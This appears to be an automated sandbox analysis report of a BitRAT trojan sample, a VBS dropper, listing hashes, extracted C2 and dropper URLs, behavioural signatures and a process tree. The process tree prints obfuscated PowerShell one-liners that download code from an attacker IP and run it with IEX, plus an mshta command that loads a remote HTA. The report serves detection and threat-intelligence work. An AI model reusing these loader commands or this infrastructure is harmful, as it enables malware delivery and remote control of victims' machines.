bitrat | b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9

General

Target

AudioApplication.vbs
Size

3KB
MD5

257cb7d47ef7b5221bd8d95cbdd7f47e
SHA1

0f4cb975fbaf27684908503de9476a2d02646734
SHA256

b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9
SHA512

d0f100255b697a85393a2961f11d4d490df8a0af31133629673cd69b2a4f8a85fe45e051557ddcfa69679aa392d3a8138a013d4fff7674bdb918e491c2356a67

Score

10^/10

bitrat trojan upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://185.7.214.7/BITRA/oo.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.7/BITRA/AU.PNG

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.7/BITRA/YES.PNG

Extracted

Family

bitrat

Version

1.38

C2

185.7.214.8:4884

Attributes

communication_password
311f4e4b7562e9d5ba31bd6afa686479
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

flow pid process

4 516 mshta.exe
5 1992 powershell.exe
6 2020 powershell.exe

flow	pid	process
4	516	mshta.exe
5	1992	powershell.exe
6	2020	powershell.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

RegSvcs.exe

pid process

1768 RegSvcs.exe
1768 RegSvcs.exe
1768 RegSvcs.exe
1768 RegSvcs.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1992 set thread context of 1768 1992 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1992 powershell.exe
2020 powershell.exe

pid	process
1768	RegSvcs.exe
1768	RegSvcs.exe
1768	RegSvcs.exe
1768	RegSvcs.exe

description	pid	process	target process
PID 1992 set thread context of 1768	1992	powershell.exe	RegSvcs.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1992	powershell.exe
2020	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	1768	RegSvcs.exe
Token: SeShutdownPrivilege	1768	RegSvcs.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

RegSvcs.exe

pid process

1768 RegSvcs.exe
1768 RegSvcs.exe

pid	process
1768	RegSvcs.exe
1768	RegSvcs.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exemshta.exepowershell.exe

description	pid	process	target process
PID 524 wrote to memory of 516	524	WScript.exe	mshta.exe
PID 524 wrote to memory of 516	524	WScript.exe	mshta.exe
PID 524 wrote to memory of 516	524	WScript.exe	mshta.exe
PID 516 wrote to memory of 2020	516	mshta.exe	powershell.exe
PID 516 wrote to memory of 2020	516	mshta.exe	powershell.exe
PID 516 wrote to memory of 2020	516	mshta.exe	powershell.exe
PID 516 wrote to memory of 1992	516	mshta.exe	powershell.exe
PID 516 wrote to memory of 1992	516	mshta.exe	powershell.exe
PID 516 wrote to memory of 1992	516	mshta.exe	powershell.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe
PID 1992 wrote to memory of 1768	1992	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
491e4953bc08a51d076eea36b52fe963

SHA1
cb05518529a74566781411bc61ba1c2415613c71

SHA256
19f295480e74354e858c88c4e78b4942ebe3095488a55dd1dee277f287bb5037

SHA512
a4a3ea21092a4780004db1db77e2a09bb2d2dfe5688ca2dfadf56be4ca44934c5b759ec09a03d9b44df7b4c6ec8508c877d8ae6bd1993e5216a5cdd26dce95b3

Download Submit
memory/524-53-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp

Filesize
8KB

Download
memory/1768-73-0x0000000075531000-0x0000000075533000-memory.dmp

Filesize
8KB

Download
memory/1768-75-0x0000000000401000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-68-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/1992-63-0x0000000002642000-0x0000000002644000-memory.dmp

Filesize
8KB

Download
memory/1992-61-0x0000000002640000-0x0000000002642000-memory.dmp

Filesize
8KB

Download
memory/1992-65-0x0000000002644000-0x0000000002647000-memory.dmp

Filesize
12KB

Download
memory/1992-59-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp

Filesize
11.4MB

Download
memory/1992-66-0x000000000264B000-0x000000000266A000-memory.dmp

Filesize
124KB

Download
memory/2020-64-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/2020-67-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/2020-58-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp

Filesize
11.4MB

Download
memory/2020-60-0x00000000025F0000-0x00000000026F2000-memory.dmp

Filesize
1.0MB

Download
memory/2020-62-0x00000000026F2000-0x00000000026F4000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads